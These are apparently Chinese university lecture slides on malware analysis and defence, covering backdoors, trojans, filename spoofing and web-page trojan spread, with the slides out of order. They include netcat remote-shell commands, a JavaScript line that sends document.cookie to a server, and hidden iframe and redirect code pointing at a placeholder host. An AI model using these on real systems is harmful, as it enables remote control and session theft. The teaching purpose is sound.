网络安全后门教程
• cshell.exe
2012-6-20 5
其他Windows下的后门程序
• CryptCat • Tini
– 提供通向Tcp端口7777,只有3K。
• ……
2012-6-20
6
2012-6-20
7
无端口后门-如何唤醒
• ICMP后门
– 不使用TCP/UDP协议。 – 使用ICMP协议进行通信。 – 难以检测。
2012-6-20 27
网页病毒的传播方式
• 1-美丽的网页名称,以及利用浏览者的 无知. • URL1: /images/mm/plmm001. gif • URL2: @/im ages/mm/plmm001.gif
2012-6-20 31
email传播网页
3. <frameset cols=“100%,*”> <frame src=“http://xxxx” scrolling=“auto”> </frameset> 4. <meta http-equiv=“refresh” content=“0; URL=http://xxxx” > 5 <iframe src="/index.html" width=0 height=0 frameborder=0></IFRAME>
2012-6-20 29
Flash传播网页
• 用Flash MX制作: 第一帧,打开动作面板,进入 Actions\Brower\NetWork\GetUrl http://网页木马地址, windows:_self 第二帧, Actions\Brower\NetWork\loadmovie http://…*.swf
2012-6-20 16
如何防御后门 --无端口后门
• 查找不寻常的程序 • 查找不寻常的进程 • 利用基于网络的IDS查找隐蔽的后门命令, 如Snort。 • 检测本地和网络中的混杂模式的网卡
– 本地检测嗅探器(Promiscdetect.exe) – 远程检测嗅探器(Sentinel,AntiSniff)
受害主机 木马
(1 )木 马 通 道 的 配 置 参 数 控制端 (2 )木 马 通 道 的 响 应 参 数 ( c) 建 立 木 马 通 道
受害主机 木马
图 7 .1 木 马 的 工 作 原 理
2012-6-20
21
2.1名字欺骗
修改文件的文件名以欺骗用户 • 与Windows扩展名放在一起
– Beauty.jpg .exe
2012-6-20
2
后门的类型
• 本地权限的提升
– 对系统有访问权的攻击者变换其权限等级成为管理员,然后攻击者 可以重新设置该系统或访问人和存储在系统中的文件。
• 单个命令的远程执行
– 攻击者可以向目标计算机发送消息。每次执行一个单独的命令,后 门执行攻击者的命令并将输出返回给攻击者。
• 远程命令行解释器访问
2012-6-20 13
检测Windows后门启动技术
• 手工检测
– – – – – 注册表启动键值 启动选项 关联方式 计划任务 …
• 利用工具检测
– Msconfig – AutoRuns
• /Utilities/Autoruns.html
– 压缩软件(winrar)
• WinRMSetup30.exe
• 防御
– 使用反病毒软件进行检测,并及时更新病毒库。
2012-6-20 24
2.3软件下载
• 从网上下载的软件是你真正需要的软件 吗? • 从网上下载的软件是否被恶意修改过? 防御措施
– 用户注意 – 完整性检测(如MD5,FileChecker) – 小心测试新软件
恶意软件(病毒)的分析与防范 Defence & analysis of malware
计算机学院 傅建明 Fujms@
2012-6-20
1
后门
• 后门是一个允许攻击者绕过系统中常规 安全控制机制的程序,他按照攻击者自 己的意图提供通道。 • 后门的重点在于为攻击者提供进入目标 计算机的通道。
– 正如远程Shell,这类后门允许攻击者通过网络快速直接地键入受害 计算机的命令提示。其比“单个命令的远程执行”要强大得多。
• 远程控制GUI
– 攻击者可以看到目标计算机的GUI,控制鼠标的移动,输入对键盘的 操作,这些都通过网络实现。
2012-6-20
3
后门的安装
• 自己植入(物理接触或入侵之后) • 通过病毒、蠕虫和恶意移动代码 • 欺骗受害者自己安装
– – – – Email 远程共享 BT下载 ……
4
2012-6-20
后门举例
• NetCat:通用的网络连接工具
用法一:
nc –l –p 5000 –e cmd.exe nc 127.0.0.1 5000
用法二:
nc –l –p 5000 nc 127.0.0.1 5000 –e cmd.exe
• 模仿其他文件名
– httpd,iexplore,notepad,ups,svchost… – 不能用“任务管理器”删除的进程名
• Csrss.exe,services.exe,smss.exe,winlogon.exe,system,system idle process
• 路径威胁
– 如将木马命名为explorer.exe放在C:\下。
2012-6-20 22
对命名陷阱的防御
• 确定指定进程属于哪个程序
– Fport,icesword,tcpview…
• 使用杀进程工具进行查杀
– Pskill,icesword…
2012-6-20
23
2.2 文件捆绑
• 恶意程序与正常程序捆绑
– 捆绑工具
• EXE捆绑机,Wrappers,binders,EXE binders…… • CHM, Flash….
2012-6-20 25
2.4 软件本身带毒
• 内部员工注入恶意代码 • 软件开发的全球化趋势
– 多个部门联合开发软件,一层层的外包
2012-6-20
26
2.5 Html传播
• • • • • 网页病毒的传播方式 Flash传播网页 email传播网页 Chm 传播网页木马 Exe2bmp
• 正常网页中携带
2012-6-20 30
email传播网页
1. <script language =javascript> Window.open(“/info.asp?msg=„ +document.cookie”) </script> 2. <body onload=“windows.location=„http://xxxx‟;”> </body>
– VNC server及VNC viewer。
• VNC server 与 VNC viewer 支持多种操作系统,如 windows,Linux,MacOS 及 Unix 系列(Unix, Solaris等),因此可将 VNC server 及 VNC viewer 分别安装在不同的操作系统中进行控制。 • 也可以通过一般的网络浏览器(如 IE 等)来控制 被控端(需要 Java 虚拟机的支持)。
2012-6-20 17
2. 特洛伊木马
• 特洛伊木马是一个程序,他看起来具有 某个有用的或善意的目的,但是实际上 掩盖着一些隐藏的恶意功能。
– 欺骗用户或者系统管理员安装 – 在计算机上与“正常”的程序一起混合运行, 将自己伪装得看起来属于该系统。
2012-6-20
18
后门 VS 特洛伊木马
• 如果一个程序仅仅提供远程访问,那么 它只是一个后门。 • 如果攻击者将这些后门功能伪装成某些 其他良性程序,那么就涉及到真正的特 洛伊木马。
(1 ) em ail (木 马 ) (1 ) 端 口 扫 描 受害主机 ( 2 ) O IC Q (木 马 ) (3 ) W eb /FT P /B B S (木 马 ) 互联网 受害主机 木马 (远程服务器) (4 ) viru s/w o rm (木 马 ) (5 ) 磁 盘 /光 盘 ( 木 马 ) 其它介质 ( a) 中 木 马 的 途 径 ( b) 木 马 与 控 制 端 的 首 次 握 手 木马通道 (1 ) 命 令 控制端 (2 ) 数 据 ( d) 控 制 端 与 木 马 的 交 互 (2 ) em ail (3 ) U D P 通 告 控制端
• 并非所有的GUI远程控制都是恶意的
– – – – – VNC(Virtual Network Computing) Windows Terminal Services PCAnywhere Back Orifice 2000 SubSeven
2012-6-20
10
VNC
• 英国剑桥大学AT&T实验室在2002年开发的轻量型 的远程控制计算机软件,任何人都可免费取得该软 件。 • VNC软件主要由两个部分组成:
2012-6-20
19
特洛伊木马
木马系统软件一般由木马配置程序、控制端程序 和木马程序(服务器程序)等三部分组成。 木马程序,也称服务器程序,它驻留在受害者的 系统中,非法获取其操作权限,负责接收控制 端指令,并根据指令或配置发送数据给控制端。 木马配置程序设置木马程序的端口号、触发条件、 木马名称等,使其在服务端藏得更隐蔽,有时 该配置功能被集成在控制端程序菜单内,不单 独作为一个程序。 控制端程序控制远程服务器,有些程序集成了木 马配置的功能。 2012-6-20 20
2012-6-20 11
VNC
程 序 举 例
2012-6-20
